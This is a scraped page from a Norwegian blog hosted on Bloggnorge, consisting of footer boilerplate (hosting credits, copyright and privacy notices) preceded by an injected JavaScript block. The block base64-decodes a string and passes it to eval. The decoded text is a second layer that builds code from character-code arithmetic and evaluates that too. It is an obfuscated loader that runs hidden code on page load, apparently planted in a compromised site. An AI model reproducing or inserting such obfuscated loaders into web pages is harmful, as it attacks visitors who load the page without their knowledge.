var IKBQHFEOFT = atob(‘dmFyIEdFTUFDWEdHS00gPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIzIC0gNSwgOTkgLSAyLCAxMjIgLSA4LCAzNSAtIDMsIDExNSAtIDgsIDEwNCAtIDMsIDEyNCAtIDMsIDMzIC0gMSwgNjUgLSA0LCAzNCAtIDIsIDQwIC0gMSwgMTMxIC0gOSwgMTE2IC0gMiwgNjkgLSAzLCA2OSAtIDMsIDExMSAtIDcsIDg4IC0gMiwgMTA2IC0gMywgMTA2IC0gMiwgMTEwIC0gNywgMTE2IC0gOSwgNDYgLSA3LCA2NSAtIDYsIDE2IC0gNiwgMTI0IC0gNiwgMTAwIC0gMywgMTE3IC0gMywgMzggLSA2LCAxMDggLSA3LCAxMTUgLSA1LCAxMDQgLSA1LCAxMDYgLSA1LCAxMDQgLSA0LCAzOCAtIDYsIDY2IC0gNSwgMzggLSA2LCA0MiAtIDMsIDY5IC0gMSwgNzEgLSA1LCA4NiAtIDksIDEyMSAtIDIsIDkwIC0gMSwgMTA5IC0gNSwgMTExIC0gOCwgMTEzIC0gNiwgNzMgLSA4LCA4MiAtIDEsIDg1IC0gMywgNzQgLSAyLCA4NyAtIDEsIDExNCAtIDYsIDExNCAtIDMsIDk1IC0gOCwgODQgLSA4LCA4OCAtIDUsIDczIC0gNCwgMTA3IC0gNywgODQgLSA1LCAxMjAgLSAxLCA3NCAtIDEsIDczIC0gMiwgNzQgLSA1LCA1NCAtIDYsIDg4IC0gMywgOTcgLSA3LCA3NCAtIDksIDcxIC0gNCwgMTAzIC0gNCwgMTE0IC0gOCwgNzQgLSAyLCA3MSAtIDMsIDgxIC0gNCwgMTExIC0gNiwgNzEgLSA1LCA2NyAtIDIsIDgyIC0gOSwgNzMgLSAyLCA4MCAtIDgsIDEyMyAtIDMsIDEyMSAtIDIsIDUxIC0gMSwgOTggLSAxLCAxMDggLSAxLCA1OCAtIDIsIDExMCAtIDIsIDY4IC0gMiwgNzUgLSA5LCAxMTYgLSA1LCA4NSAtIDYsIDcyIC0gMSwgMTI2IC0gNywgNTcgLSA0LCA5NCAtIDgsIDk4IC0gMSwgNTMgLSAyLCAxMDkgLSAxLCAxMTEgLSA2LCA3OSAtIDUsIDEwOCAtIDQsIDg2IC0gMSwgODUgLSA2LCA2OSAtIDIsIDUzIC0gNSwgOTMgLSA4LCA4MyAtIDksIDc5IC0gOSwgMTI3IC0gNSwgOTAgLSAxLCA3NyAtIDksIDczIC0gMSwgNzAgLSAzLCA4MCAtIDcsIDkzIC0gNywgNjkgLSA0LCA4OCAtIDcsIDkyIC0gNywgMTA4IC0gNywgNzUgLSA3LCAxMTIgLSA4LCAxMDIgLSAyLCAxMTYgLSAzLCA5MyAtIDMsIDg5IC0gNywgMTE4IC0gMywgMTA4IC0gMSwgNzIgLSA2LCA3MSAtIDIsIDY1IC0gOCwgODUgLSA5LCA5MiAtIDgsIDc0IC0gOCwgNzUgLSAyLCA3NiAtIDUsIDc5IC0gMSwgMTA5IC0gMywgODEgLSA3LCA5MiAtIDksIDEwNSAtIDQsIDkxIC0gNiwgMTA3IC0gNCwgMTA2IC0gNywgNzcgLSA3LCA4OSAtIDgsIDExOCAtIDcsIDEwOCAtIDksIDc3IC0gNywgNjkgLSAyLCAxMjMgLSA4LCAxMDUgLSAxLCA3MCAtIDMsIDg1IC0gMiwgOTIgLSAzLCA4MCAtIDEsIDgzIC0gMSwgMTA5IC0gNiwgMTE2IC0gOSwgNzcgLSA1LCA4NyAtIDEsIDg4IC0gNywgNzUgLSA2LCA1OSAtIDksIDc5IC0gNiwgMTI3IC0gNywgMTIwIC0gMSwgNTIgLSA1LCA3NCAtIDgsIDcyIC0gMywgMTAxIC0gMiwgODIgLSA3LCA2OSAtIDIsIDEwOSAtIDUsIDgyIC0gNSwgMTAyIC0gMywgMTAzIC0gNSwgNjkgLSAyLCAxMDggLSA1LCAxMDIgLSA0LCAxMDggLSA5LCA4OCAtIDMsIDU5IC0gNiwgODYgLSAyLCAxMDUgLSA3LCA4MiAtIDEsIDYwIC0gNCwgOTEgLSA1LCA3NiAtIDcsIDkwIC0gNiwgMTAxIC0gMiwgMTI0IC0gNiwgNzUgLSA3LCA4NSAtIDEsIDEwNiAtIDMsIDg4IC0gNCwgODYgLSA0LCAxMDggLSA1LCA1OSAtIDMsIDg1IC0gNiwgNzYgLSA1LCAxMjMgLSAzLCA5MiAtIDIsIDExNiAtIDEsIDc3IC0gNCwgMTI5IC0gOSwgMTEyIC0gOSwgMTEzIC0gNCwgNjggLSAzLCAxMDQgLSAxLCA5NCAtIDUsIDc3IC0gOSwgODAgLSA1LCA3MSAtIDUsIDc4IC0gNSwgMTA3IC0gOSwgODQgLSA4LCAxMTQgLSA5LCA5MSAtIDEsIDY2IC0gMSwgNzggLSA0LCAxMTIgLSA4LCA5MCAtIDUsIDg2IC0gNywgNjggLSAxLCA1NyAtIDksIDgyIC0gOCwgNzAgLSA0LCAxMDIgLSAxLCA2OCAtIDMsIDY3IC0gNiwgNzAgLSA5LCA0NSAtIDYsIDYzIC0gNCwgMTcgLSA3LCAxMDUgLSAzLCAxMjQgLSA3LCAxMTcgLSA3LCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTMgLSAyLCAxMTggLSA4LCAzOSAtIDcsIDEyMyAtIDMsIDExNCAtIDMsIDEyMyAtIDksIDEwMSAtIDYsIDEwNSAtIDQsIDExMSAtIDEsIDEwMiAtIDMsIDQ2IC0gNiwgMTE3IC0gMiwgMTI1IC0gOSwgMTE1IC0gMSwgMTExIC0gNiwgMTE2IC0gNiwgMTA5IC0gNiwgNDUgLSAxLCAzMyAtIDEsIDExNSAtIDgsIDEwNiAtIDUsIDEyNSAtIDQsIDQyIC0gMSwgMzYgLSA0LCAxMjkgLSA2LCAxMyAtIDMsIDMzIC0gMSwgMzYgLSA0LCAxMjMgLSA1LCAxMDYgLSA5LCAxMjEgLSA3LCAzNSAtIDMsIDExNSAtIDEsIDEwMiAtIDEsIDExOCAtIDMsIDQxIC0gOSwgNjQgLSAzLCAzOCAtIDYsIDQ1IC0gNiwgNDYgLSA3LCA2MiAtIDMsIDEzIC0gMywgMzYgLSA0LCAzNSAtIDMsIDEwNSAtIDMsIDExNiAtIDUsIDEyMCAtIDYsIDM3IC0gNSwgNDQgLSA0LCAxMjQgLSA2LCAxMDUgLSA4LCAxMTcgLSAzLCAzNCAtIDIsIDEwNyAtIDIsIDM1IC0gMywgNjMgLSAyLCAzOCAtIDYsIDUzIC0gNSwgNjcgLSA4LCAzOSAtIDcsIDExMCAtIDUsIDMzIC0gMSwgNjEgLSAxLCAzNCAtIDIsIDEyMSAtIDYsIDExOSAtIDMsIDEyMSAtIDcsIDEwNyAtIDIsIDExNyAtIDcsIDEwOCAtIDUsIDUwIC0gNCwgMTE1IC0gNywgMTA5IC0gOCwgMTE0IC0gNCwgMTA1IC0gMiwgMTIyIC0gNiwgMTEwIC0gNiwgNjIgLSAzLCAzOSAtIDcsIDEwOSAtIDQsIDQ0IC0gMSwgNDUgLSAyLCA0OSAtIDgsIDQwIC0gOCwgMTI3IC0gNCwgMTMgLSAzLCAzNiAtIDQsIDM2IC0gNCwgMzQgLSAyLCA0MCAtIDgsIDExOCAtIDQsIDExMCAtIDksIDExOSAtIDQsIDM2IC0gNCwgNDYgLSAzLCA2NiAtIDUsIDM5IC0gNywgODQgLSAxLCAxMTggLSAyLCAxMjMgLSA5LCAxMTMgLSA4LCAxMTEgLSAxLCAxMDYgLSAzLCA1NSAtIDksIDEwNyAtIDUsIDEyMSAtIDcsIDExNiAtIDUsIDExNiAtIDcsIDY5IC0gMiwgMTA5IC0gNSwgMTAzIC0gNiwgMTE1IC0gMSwgNzAgLSAzLCAxMTQgLSAzLCAxMDQgLSA0LCAxMDcgLSA2LCA0NCAtIDQsIDExNiAtIDEsIDEyNSAtIDksIDEyMCAtIDYsIDExMyAtIDgsIDExNiAtIDYsIDEwOCAtIDUsIDQ4IC0gMiwgMTAxIC0gMiwgMTEyIC0gOCwgMTA2IC0gOSwgMTE4IC0gNCwgNzEgLSA0LCAxMTcgLSA2LCAxMDcgLSA3LCAxMDMgLSAyLCA3MCAtIDUsIDExOSAtIDMsIDQ5IC0gOSwgMTEzIC0gOCwgNDcgLSA2LCAzMyAtIDEsIDk5IC0gNSwgMTUgLSA1LCAxNCAtIDUsIDE0IC0gNSwgMTUgLSA2LCAxNSAtIDYsIDExNiAtIDksIDEwNiAtIDUsIDEyMiAtIDEsIDUxIC0gNSwgMTA3IC0gOCwgMTA3IC0gMywgOTggLSAxLCAxMTggLSA0LCA2OSAtIDIsIDExMiAtIDEsIDEwMSAtIDEsIDEwMyAtIDIsIDY5IC0gNCwgMTE4IC0gMiwgNDggLSA4LCAxMTMgLSA4LCAzOCAtIDYsIDM4IC0gMSwgMzUgLSAzLCAxMTMgLSA2LCAxMDMgLSAyLCAxMjUgLSA0LCA1NCAtIDgsIDExMCAtIDIsIDEwOSAtIDgsIDExNiAtIDYsIDExMSAtIDgsIDExOSAtIDMsIDExMiAtIDgsIDQ2IC0gNSwgNDUgLSA0LCA2NiAtIDcsIDE4IC0gOCwgMzMgLSAxLCAzNSAtIDMsIDEyNyAtIDIsIDE4IC0gOCwgMzcgLSA1LCA0MCAtIDgsIDExNSAtIDEsIDEwNiAtIDUsIDEyNCAtIDgsIDEyNCAtIDcsIDEyMyAtIDksIDExOCAtIDgsIDMzIC0gMSwgMTIzIC0gOSwgMTA2IC0gNSwgMTIwIC0gNSwgNjAgLSAxLCAxMiAtIDIsIDEzMiAtIDcsIDE2IC0gNiwgMTggLSA4LCAxMjcgLSA5LCAxMDQgLSA3LCAxMTggLSA0LCAzOCAtIDYsIDEwMiAtIDIsIDEwMiAtIDEsIDEwNiAtIDcsIDQwIC0gOCwgNjggLSA3LCAzOSAtIDcsIDEyNyAtIDcsIDExNiAtIDUsIDExNSAtIDEsIDk3IC0gMiwgMTEwIC0gOSwgMTE5IC0gOSwgMTAyIC0gMywgNDkgLSA5LCAxMDUgLSA4LCAxMTcgLSAxLCAxMTQgLSAzLCAxMDMgLSA1LCA0MiAtIDIsIDExMCAtIDksIDExNyAtIDcsIDEwNCAtIDUsIDEwNSAtIDQsIDEwNyAtIDcsIDQ4IC0gNywgNDUgLSAxLCAzNyAtIDUsIDExMiAtIDUsIDEwNSAtIDQsIDEyMyAtIDIsIDQ4IC0gNywgNjMgLSA0LCAxOSAtIDksIDQzIC0gMywgMTEyIC0gMiwgMTA0IC0gMywgMTI2IC0gNywgMzUgLSAzLCA3NSAtIDUsIDEyMSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEyNCAtIDgsIDExMyAtIDgsIDExNSAtIDQsIDExNiAtIDYsIDQzIC0gMywgMTA1IC0gNSwgMTAyIC0gMSwgMTAwIC0gMSwgNDQgLSAzLCA0NSAtIDQsIDQ3IC0gNywgNDkgLSA4LCA2MiAtIDMsIDE0IC0gNCwgMTEgLSAxKTtldmFsKEdFTUFDWEdHS00pOw==’);
eval(IKBQHFEOFT);

Annonser

Driftes av Bloggnorge.com - Gratis Blogg | PRO ISP - Blogg på webhotell og eget domenet | Genc Media - Webdesign og hjemmeside
Bloggen "ULVEHYL" er underlagt Lov om opphavsrett til åndsverk. Det betyr at du ikke kan kopiere tekst, bilder eller annet innhold uten tillatelse. Forfatter er selv ansvarlig for innhold. Tekniske spørmål rettes til post[att]bloggnorge[dått]com.
css.php
Driftes av Bloggnorge.com | Laget av Hjemmesideleverandøren
Denne bloggen er underlagt Lov om opphavsrett til åndsverk. Det betyr at du ikke kan kopiere tekst, bilder eller annet innhold uten tillatelse fra bloggeren. Forfatter er selv ansvarlig for innhold.
Personvern og cookies | Tekniske spørsmål rettes til post[att]lykkemedia.[dått]no.